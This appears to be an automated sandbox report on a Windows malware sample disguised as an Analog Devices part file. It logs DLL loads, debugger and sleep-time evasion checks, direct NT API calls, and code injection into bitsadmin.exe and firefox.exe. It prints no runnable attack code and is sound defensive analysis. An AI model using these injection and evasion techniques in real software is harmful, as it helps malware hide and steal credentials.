Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24036B push ecx; ret	0_2_0B24036C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0041480C push 8080F99Fh; retf	2_2_00414814
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040182E push edx; ret	2_2_00401831
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00414893 pushad ; iretd	2_2_004148B1
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00417253 push ds; ret	2_2_00417260
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00417298 push FFFFFF8Fh; retf	2_2_0041729A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004143DD push edi; iretd	2_2_004143EC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004143E3 push edi; iretd	2_2_004143EC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004033B0 push eax; ret	2_2_004033B2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00408480 pushad ; iretd	2_2_00408490
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00408667 push E15317CDh; retf	2_2_0040866C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00418E05 push ss; retf	2_2_00418E20
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D225F pushad ; ret	2_2_016D27F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D27FA pushad ; ret	2_2_016D27F9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017009AD push ecx; mov dword ptr [esp], ecx	2_2_017009B6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016D283D push eax; iretd	2_2_016D2858
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301027B pushad ; iretd	6_2_03010299
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AAE5 push 62D0A9FFh; retf	6_2_0301AAFD
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030101F4 push 8080F99Fh; retf	6_2_030101FC
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0300404F push E15317CDh; retf	6_2_03004054
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301F097 push es; iretd	6_2_0301F0A4
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_030147ED push ss; retf	6_2_03014808
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03003E68 pushad ; iretd	6_2_03003E78
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AEB4 push eax; ret	6_2_0301AECF
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_0301AED1 push eax; ret	6_2_0301AECF
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03012C3B push ds; ret	6_2_03012C48
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Code function: 6_2_03012C80 push FFFFFF8Fh; retf	6_2_03012C82
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE225F pushad ; ret	7_2_02FE27F9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE27FA pushad ; ret	7_2_02FE27F9
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030109AD push ecx; mov dword ptr [esp], ecx	7_2_030109B6
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_02FE283D push eax; iretd	7_2_02FE2858

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 5230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 6230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 6360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 7360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: C250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: C6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: D6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: E6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: F6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Memory allocated: 106E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\bitsadmin.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6932	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6932	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe TID: 1892	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed

Source: bitsadmin.exe, 00000007.00000002.3524147073.0000000000862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~'Y
Source: firefox.exe, 00000009.00000002.2571647429.00000243B54EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: cvSKtqilyhlQ.exe, 00000008.00000002.3524686640.000000000128F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

